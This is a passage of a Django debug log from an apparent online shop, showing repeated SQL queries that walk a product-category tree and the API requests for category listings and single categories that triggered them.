ASC; args=(40,) DEBUG 2019-12-19 13:45:12,501 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:45:12,506 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:45:12,509 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:45:12,512 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:45:12,514 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:45:12,517 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:45:12,520 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:45:12,524 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:45:12,527 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:45:12,530 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:45:12,534 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:45:12,537 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:45:12] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:45:13,515 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:45:13,522 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:45:13,526 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 19; args=(19,) DEBUG 2019-12-19 13:45:13,531 utils 4252 140031721535232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:45:13,534 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:45:13,535 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:45:13,539 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [19/Dec/2019 13:45:13] "GET /api/v1/categories/19 HTTP/1.0" 200 217 DEBUG 2019-12-19 13:45:13,541 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:45:13,544 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:45:13,546 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:45:13,548 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:45:13,552 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:45:13,554 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:45:13,556 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:45:13,559 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:45:13,561 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:45:13,564 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:45:13,567 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:45:13,569 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:45:13,571 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:45:13,573 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:45:13,577 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:45:13,579 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:45:13,581 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:45:13,584 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:45:13,586 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:45:13,588 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:45:13,592 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:45:13,594 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:45:13,596 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:45:13,599 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:45:13,601 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:45:13,604 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:45:13,607 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:45:13,610 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:45:13,612 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:45:13,615 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:45:13,619 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:45:13,621 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:45:13,623 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:45:13,625 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:45:13,628 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:45:13,630 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:45:13,633 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:45:13,635 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:45:13,637 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:45:13,640 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:45:13,642 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:45:13] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:46:30,485 utils 4252 140031721535232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:46:30,491 utils 4252 140031503103744 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:46:30,506 utils 4252 140031721535232 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:46:30,512 utils 4252 140031503103744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:46:30,515 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:46:30,521 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [19/Dec/2019 13:46:30] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:46:30,529 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:46:30,534 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", 